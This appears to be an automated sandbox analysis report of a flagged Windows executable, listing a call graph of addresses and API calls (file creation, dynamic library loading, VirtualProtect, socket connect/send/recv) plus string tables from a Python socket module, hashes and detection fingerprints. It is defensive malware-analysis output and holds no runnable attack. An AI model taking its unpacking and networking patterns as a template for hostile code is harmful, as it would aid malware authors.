75438->74847 75439 7ff7ead14ad6 75439->75434 75440 7ff7ead14b40 75439->75440 75441 7ff7ead14af1 75439->75441 75444 7ff7ead14ae8 75439->75444 75440->75434 75442 7ff7ead14b4a 75440->75442 75448 7ff7ead1a948 11 API calls 2 library calls 75441->75448 75449 7ff7ead1a948 11 API calls 2 library calls 75442->75449 75444->75434 75444->75441 75446->75435 75447->75439 75448->75435 75449->75435 75450->75435 75452 7ff7ead15ec8 75451->75452 75453 7ff7ead15eee 75452->75453 75456 7ff7ead15f21 75452->75456 75482 7ff7ead14f08 11 API calls _get_daylight 75453->75482 75455 7ff7ead15ef3 75483 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 75455->75483 75458 7ff7ead15f27 75456->75458 75459 7ff7ead15f34 75456->75459 75484 7ff7ead14f08 11 API calls _get_daylight 75458->75484 75470 7ff7ead1ac28 75459->75470 75462 7ff7ead04616 75462->75097 75464 7ff7ead15f48 75485 7ff7ead14f08 11 API calls _get_daylight 75464->75485 75465 7ff7ead15f55 75477 7ff7ead1fecc 75465->75477 75468 7ff7ead15f68 75486 7ff7ead15478 LeaveCriticalSection 75468->75486 75487 7ff7ead202d8 EnterCriticalSection 75470->75487 75472 7ff7ead1ac3f 75473 7ff7ead1ac9c 19 API calls 75472->75473 75474 7ff7ead1ac4a 75473->75474 75475 7ff7ead20338 _isindst LeaveCriticalSection 75474->75475 75476 7ff7ead15f3e 75475->75476 75476->75464 75476->75465 75488 7ff7ead1fbc8 75477->75488 75480 7ff7ead1ff26 75480->75468 75482->75455 75483->75462 75484->75462 75485->75462 75493 7ff7ead1fc03 __vcrt_InitializeCriticalSectionEx 75488->75493 75490 7ff7ead1fea1 75507 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 75490->75507 75492 7ff7ead1fdd3 75492->75480 75500 7ff7ead26d54 75492->75500 75493->75493 75498 7ff7ead1fdca 75493->75498 75503 7ff7ead17a3c 51 API calls 3 library calls 75493->75503 75495 7ff7ead1fe35 75495->75498 75504 7ff7ead17a3c 51 API calls 3 library calls 75495->75504 75497 7ff7ead1fe54 75497->75498 75505 7ff7ead17a3c 51 API calls 3 library calls 75497->75505 75498->75492 75506 7ff7ead14f08 11 API calls _get_daylight 75498->75506 75508 7ff7ead26354 75500->75508 75503->75495 75504->75497 75505->75498 75506->75490 75507->75492 75509 7ff7ead26389 75508->75509 75510 7ff7ead2636b 75508->75510 75509->75510 75512 7ff7ead263a5 75509->75512 75562 7ff7ead14f08 11 API calls _get_daylight 75510->75562 75519 7ff7ead26964 75512->75519 75513 7ff7ead26370 75563 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 75513->75563 75517 7ff7ead2637c 75517->75480 75565 7ff7ead26698 75519->75565 75522 7ff7ead269d9 75597 7ff7ead14ee8 11 API calls _get_daylight 75522->75597 75523 7ff7ead269f1 75585 7ff7ead18520 75523->75585 75534 7ff7ead263d0 75534->75517 75564 7ff7ead184f8 LeaveCriticalSection 75534->75564 75542 7ff7ead269de 75598 7ff7ead14f08 11 API calls _get_daylight 75542->75598 75562->75513 75563->75517 75566 7ff7ead266c4 75565->75566 75574 7ff7ead266de 75565->75574 75566->75574 75610 7ff7ead14f08 11 API calls _get_daylight 75566->75610 75568 7ff7ead266d3 75611 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 75568->75611 75570 7ff7ead267ad 75581 7ff7ead2680a 75570->75581 75616 7ff7ead19b78 37 API calls 2 library calls 75570->75616 75571 7ff7ead2675c 75571->75570 75614 7ff7ead14f08 11 API calls _get_daylight 75571->75614 75574->75571 75612 7ff7ead14f08 11 API calls _get_daylight 75574->75612 75575 7ff7ead26806 75578 7ff7ead26888 75575->75578 75575->75581 75576 7ff7ead267a2 75615 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 75576->75615 75617 7ff7ead1a900 17 API calls __FrameHandler3::FrameUnwindToEmptyState 75578->75617 75580 7ff7ead26751 75613 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 75580->75613 75581->75522 75581->75523 75618 7ff7ead202d8 EnterCriticalSection 75585->75618 75597->75542 75598->75534 75610->75568 75611->75574 75612->75580 75613->75571 75614->75576 75615->75570 75616->75575 75620 7ff7ead178f8 75619->75620 75623 7ff7ead173d4 75620->75623 75622 7ff7ead17911 75622->75107 75624 7ff7ead1741e 75623->75624 75625 7ff7ead173ef 75623->75625 75633 7ff7ead1546c EnterCriticalSection 75624->75633 75634 7ff7ead1a814 37 API calls 2 library calls 75625->75634 75628 7ff7ead1740f 75628->75622 75629 7ff7ead17423 75630 7ff7ead17440 38 API calls 75629->75630 75631 7ff7ead1742f 75630->75631 75632 7ff7ead15478 _fread_nolock LeaveCriticalSection 75631->75632 75632->75628 75634->75628 75636 7ff7ead0fe71 75635->75636 75637 7ff7ead0fe43 75635->75637 75639 7ff7ead0fe63 75636->75639 75645 7ff7ead1546c EnterCriticalSection 75636->75645 75646 7ff7ead1a814 37 API calls 2 library calls 75637->75646 75639->75111 75641 7ff7ead0fe88 75642 7ff7ead0fea4 72 API calls 75641->75642 75643 7ff7ead0fe94 75642->75643 75644 7ff7ead15478 _fread_nolock LeaveCriticalSection 75643->75644 75644->75639 75646->75639 75647->75128 75649 7ff8e80f2150 75651 7ff8e80f216f 75649->75651 75650 7ff8e80f223d 75651->75650 75653 7ff8e80f2260 75651->75653 75654 7ff8e80f2286 75653->75654 75655 7ff8e80f3b6a 75654->75655 75658 7ff8e80f22c8 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry 75654->75658 75657 7ff8e80f22a6 75657->75650 75658->75657 75659 7ff8e81353dc 75666 7ff8e81340f0 75659->75666 75662 7ff8e813549a 75663 7ff8e813541c 75664 7ff8e813544c bind 75663->75664 75665 7ff8e813546e 75663->75665 75664->75665 75684 7ff8e81329f0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 75665->75684 75667 7ff8e8134123 75666->75667 75669 7ff8e81343fe 75666->75669 75668 7ff8e813412c 75667->75668 75670 7ff8e81342f9 75667->75670 75672 7ff8e8134285 75668->75672 75676 7ff8e8134135 75668->75676 75675 7ff8e813413a 75669->75675 75687 7ff8e8134f74 8 API calls 75669->75687 75670->75675 75686 7ff8e8134f74 8 API calls 75670->75686 75672->75675 75685 7ff8e8134e88 00007FF906024340 75672->75685 75675->75663 75676->75675 75681 7ff8e8134215 UuidFromStringW 75676->75681 75677 7ff8e81344b7 75677->75675 75678 7ff8e81344eb htons 75677->75678 75678->75675 75679 7ff8e8134382 75679->75675 75680 7ff8e81343cf htons htonl 75679->75680 75680->75675 75682 7ff8e813422d 75681->75682 75682->75675 75683 7ff8e8134258 UuidFromStringW 75682->75683 75683->75675 75684->75662 75685->75675 75686->75679 75687->75677 75697 7ff8e75333c0 75702 7ff8e7533fca 75697->75702 75705 7ff8e75333d8 75697->75705 75698 7ff8e7533ed7 LoadLibraryA 75699 7ff8e7533ef1 75698->75699 75703 7ff8e7533f10 GetProcAddress 75699->75703 75699->75705 75701 7ff8e7533f32 VirtualProtect VirtualProtect 75701->75702 75702->75702 75703->75699 75704 7ff8e7533f27 75703->75704 75705->75698 75705->75701 75706 7ff8e81310c0 WSAStartup 75707 7ff8e8131102 00007FF8E70A082C 75706->75707 75710 7ff8e813283e 75706->75710 75711 7ff8e8131135 75707->75711 75709 7ff8e8132850 75715 7ff8e81329f0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 75710->75715 75711->75710 75712 7ff8e81327a7 VerSetConditionMask VerSetConditionMask VerSetConditionMask 75711->75712 75713 7ff8e81327f7 VerifyVersionInfoA 75712->75713 75713->75710 75714 7ff8e8132814 75713->75714 75714->75710 75714->75713 75715->75709 75716 7ff8e6c89060 75717 7ff8e6c89c01 75716->75717 75724 7ff8e6c89078 75716->75724 75718 7ff8e6c89b0e LoadLibraryA 75719 7ff8e6c89b28 75718->75719 75722 7ff8e6c89b47 GetProcAddress 75719->75722 75719->75724 75721 7ff8e6c89b69 VirtualProtect VirtualProtect 75721->75717 75722->75719 75723 7ff8e6c89b5e 75722->75723 75724->75718 75724->75721 75725 7ff7ead15628 75726 7ff7ead1565f 75725->75726 75727 7ff7ead15642 75725->75727 75726->75727 75729 7ff7ead15672 CreateFileW 75726->75729 75750 7ff7ead14ee8 11 API calls _get_daylight 75727->75750 75731 7ff7ead156dc 75729->75731 75732 7ff7ead156a6 75729->75732 75730 7ff7ead15647 75751 7ff7ead14f08 11 API calls _get_daylight 75730->75751 75754 7ff7ead15c04 46 API calls 3 library calls 75731->75754 75753 7ff7ead1577c 59 API calls 3 library calls 75732->75753 75736 7ff7ead1564f 75752 7ff7ead1a8e0 37 API calls _invalid_parameter_noinfo 75736->75752 75737 7ff7ead156b4 75742 7ff7ead156bb CloseHandle 75737->75742 75743 7ff7ead156d1 CloseHandle 75737->75743 75738 7ff7ead156e1 75739 7ff7ead15710 75738->75739 75740 7ff7ead156e5 75738->75740 75756 7ff7ead159c4 51 API calls 75739->75756 75755 7ff7ead14e7c 11 API calls 2 library calls 75740->75755 75745 7ff7ead1565a 75742->75745 75743->75745 75747 7ff7ead1571d 75757 7ff7ead15b00 21 API calls _fread_nolock 75747->75757 75749 7ff7ead156ef 75749->75745 75750->75730 75751->75736 75752->75745 75753->75737 75754->75738 75755->75749 75756->75747 75757->75749 75758 7ff8e81356e8 75759 7ff8e81356ff 75758->75759 75763 7ff8e813573d 75758->75763 75760 7ff8e8135712 closesocket 75759->75760 75761 7ff8e8135729 75760->75761 75762 7ff8e8135732 00007FF906013440 75761->75762 75761->75763 75762->75763 75773 7ff7ead02fe0 75774 7ff7ead02ff0 75773->75774 75775 7ff7ead03041 75774->75775 75776 7ff7ead0302b 75774->75776 75778 7ff7ead03061 75775->75778 75789 7ff7ead03077 __vcrt_freefls 75775->75789 75801 7ff7ead02710 54 API calls _log10_special 75776->75801 75802 7ff7ead02710 54 API calls _log10_special 75778->75802 75780 7ff7ead0c550 _log10_special 8 API calls 75782 7ff7ead031fa 75780->75782 75781 7ff7ead03037 __vcrt_freefls 75781->75780 75783 7ff7ead01470 116 API calls 75783->75789 75784 7ff7ead03349 75809 7ff7ead02710 54 API calls _log10_special 75784->75809 75785 7ff7ead01c80 49 API calls 75785->75789 75787 7ff7ead03333 75808 7ff7ead02710 54 API calls _log10_special 75787->75808 75789->75781 75789->75783 75789->75784 75789->75785 75789->75787 75790 7ff7ead0330d 75789->75790 75792 7ff7ead03207 75789->75792 75807 7ff7ead02710 54 API calls _log10_special 75790->75807 75794 7ff7ead03273 75792->75794 75803 7ff7ead1a404 37 API calls 2 library calls 75792->75803 75795 7ff7ead03290 75794->75795 75796 7ff7ead0329e 75794->75796 75804 7ff7ead1a404 37 API calls 2 library calls 75795->75804 75805 7ff7ead02dd0 37 API calls 75796->75805 75799 7ff7ead0329c 75806 7ff7ead02500 54 API calls __vcrt_freefls 75799->75806 75801->75781 75802->75781 75803->75794 75804->75799 75805->75799 75806->75781 75807->75781 75808->75781 75809->75781 75810 7ff8e813746c 75813 7ff8e813750e 75810->75813 75811 7ff8e813778b 75812 7ff8e813780f FreeAddrInfoW 75812->75811 75813->75811 75814 7ff8e813766d 75813->75814 75815 7ff8e8137645 getaddrinfo 75813->75815 75814->75811 75814->75812 75819 7ff8e8137668 75815->75819 75817 7ff8e8137785 FreeAddrInfoW 75817->75811 75818 7ff8e813774a 75818->75811 75818->75817 75819->75814 75819->75818 75820 7ff8e8134b80 12 API calls 75819->75820 75820->75819 75830 7ff8e8136c34 75832 7ff8e8136c7c 75830->75832 75833 7ff8e8136c80 75832->75833 75834 7ff8e81354ac 75832->75834 75836 7ff8e81354e3 75834->75836 75837 7ff8e813555b WSAGetLastError 75836->75837 75838 7ff8e8135553 WSAGetLastError 75836->75838 75839 7ff8e813550b 75836->75839 75840 7ff8e81355c8 WSAGetLastError 75836->75840 75841 7ff8e81355c0 WSAGetLastError 75836->75841 75842 7ff8e81355e8 WSAGetLastError 75836->75842 75846 7ff8e8136bec 75836->75846 75849 7ff8e813660c 75836->75849 75852 7ff8e81348b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry select 75836->75852 75837->75836 75837->75839 75838->75837 75839->75832 75840->75836 75841->75840 75842->75836 75843 7ff8e81355fd WSAGetLastError 75842->75843 75843->75836 75843->75839 75847 7ff8e8136c02 75846->75847 75848 7ff8e8136c10 send 75846->75848 75847->75848 75848->75836 75850 7ff8e8136622 75849->75850 75851 7ff8e8136630 recv 75849->75851 75850->75851 75851->75836 75852->75836 75853 7ff8e8137174 75854 7ff8e8137187 75853->75854 75856 7ff8e81371a4 75854->75856 75857 7ff8e81349cc 75854->75857 75858 7ff8e8139568 75857->75858 75859 7ff8e81349e6 ioctlsocket 75858->75859 75860 7ff8e8134a1c 75859->75860 75862 7ff8e8134a12 75859->75862 75861 7ff8e8134a22 WSAGetLastError 75860->75861 75861->75862 75862->75856 75863 7ff8e8136654 75865 7ff8e81366a5 75863->75865 75864 7ff8e81366b3 75865->75864 75867 7ff8e81365ac 75865->75867 75868 7ff8e81365b9 75867->75868 75869 7ff8e81365b5 75867->75869 75870 7ff8e81354ac 12 API calls 75868->75870 75869->75864 75870->75869 75871 7ff8e8135754 75872 7ff8e81340f0 14 API calls 75871->75872 75875 7ff8e8135794 75872->75875 75874 7ff8e81357ed 75877 7ff8e81357ce 75875->75877 75878 7ff8e81347a0 75875->75878 75892 7ff8e81329f0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 75877->75892 75879 7ff8e8139568 75878->75879 75880 7ff8e81347c4 connect 75879->75880 75881 7ff8e81347e2 75880->75881 75882 7ff8e81347ea WSAGetLastError WSAGetLastError 75881->75882 75891 7ff8e8134826 75881->75891 75883 7ff8e8134803 75882->75883 75884 7ff8e8134816 75883->75884 75886 7ff8e813483e 75883->75886 75883->75891 75885 7ff8e813481b WSASetLastError 75884->75885 75884->75891 75885->75891 75887 7ff8e813485a 75886->75887 75888 7ff8e8134873 75886->75888 75890 7ff8e81354ac 12 API calls 75887->75890 75889 7ff8e81354ac 12 API calls 75888->75889 75889->75891 75890->75891 75891->75877 75892->75874 75893 7ff8e8135cf4 75897 7ff8e8135d2e 75893->75897 75895 7ff8e8135e2c 75924 7ff8e81329f0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 75895->75924 75897->75895 75899 7ff8e8135e54 75897->75899 75898 7ff8e8135e40 75902 7ff8e8135e9e 75899->75902 75900 7ff8e8135ef3 75904 7ff8e81360c6 75900->75904 75910 7ff8e8135f07 75900->75910 75901 7ff8e813619e 75906 7ff8e81361cd WSASocketW 75901->75906 75902->75900 75902->75901 75903 7ff8e8135f11 75902->75903 75925 7ff8e81329f0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 75903->75925 75904->75903 75909 7ff8e813611d getsockname 75904->75909 75908 7ff8e81361fa 75906->75908 75907 7ff8e8135f43 75907->75895 75913 7ff8e8136078 75908->75913 75914 7ff8e81360aa 75908->75914 75911 7ff8e8136140 75909->75911 75912 7ff8e8136134 75909->75912 75910->75903 75917 7ff8e813603a WSASocketW 75910->75917 75911->75913 75915 7ff8e8136149 WSAGetLastError 75911->75915 75912->75914 75916 7ff8e8136160 getsockopt 75912->75916 75926 7ff8e8134da4 WSAGetLastError 75913->75926 75927 7ff8e8134740 ioctlsocket WSAGetLastError 75914->75927 75915->75912 75915->75913 75916->75913 75916->75914 75920 7ff8e8136072 75917->75920 75920->75913 75922 7ff8e8136082 SetHandleInformation 75920->75922 75921 7ff8e813609c closesocket 75921->75903 75922->75914 75923 7ff8e8136094 75922->75923 75923->75903 75923->75921 75924->75898 75925->75907 75926->75903 75927->75923 75928 7ff8e8136ff4 75930 7ff8e813702a 75928->75930 75931 7ff8e813702e setsockopt 75930->75931 75932 7ff8e81370b6 75930->75932 75934 7ff8e81370f7 75931->75934 75933 7ff8e8137123 setsockopt 75932->75933 75932->75934 75933->75934

                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                              Function 00007FF8E8131091 Relevance: 349.5, APIs: 6, Strings: 193, Instructions: 1276networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConditionMask$00007A082InfoStartupVerifyVersion
                                                                                                                                                                                                                              • String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
                                                                                                                                                                                                                              • API String ID: 3409425757-1188461360
                                                                                                                                                                                                                              • Opcode ID: 4dce1cfbc17b3c99d7e4a2bf2870c05e4680d8e1b4ef0cfb511a93ced94c5d55
                                                                                                                                                                                                                              • Instruction ID: e3c54ee20d32e75cfac825bf8c526926c241c434da7d0ceb0e42ef44fe726468
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dce1cfbc17b3c99d7e4a2bf2870c05e4680d8e1b4ef0cfb511a93ced94c5d55
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAD2F960B08B1396FB109FA6E8547BD2794AF47FD1F865435CA0E86260DF6DE188C31B
                                                                                                                                                                                                                              Function 00007FF8E81310C0 Relevance: 344.2, APIs: 6, Strings: 190, Instructions: 1239networkCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConditionMask$00007A082InfoStartupVerifyVersion
                                                                                                                                                                                                                              • String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
                                                                                                                                                                                                                              • API String ID: 3409425757-3643889990
                                                                                                                                                                                                                              • Opcode ID: 402a8c535e09a4f8d89ed768b117a8b9010c23cdf2382df9e6d88d85c51fdd0b
                                                                                                                                                                                                                              • Instruction ID: 42c73c00293865f926743013a11b8892a89cdffb63ab86cedf0214c3fe8dcea2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 402a8c535e09a4f8d89ed768b117a8b9010c23cdf2382df9e6d88d85c51fdd0b
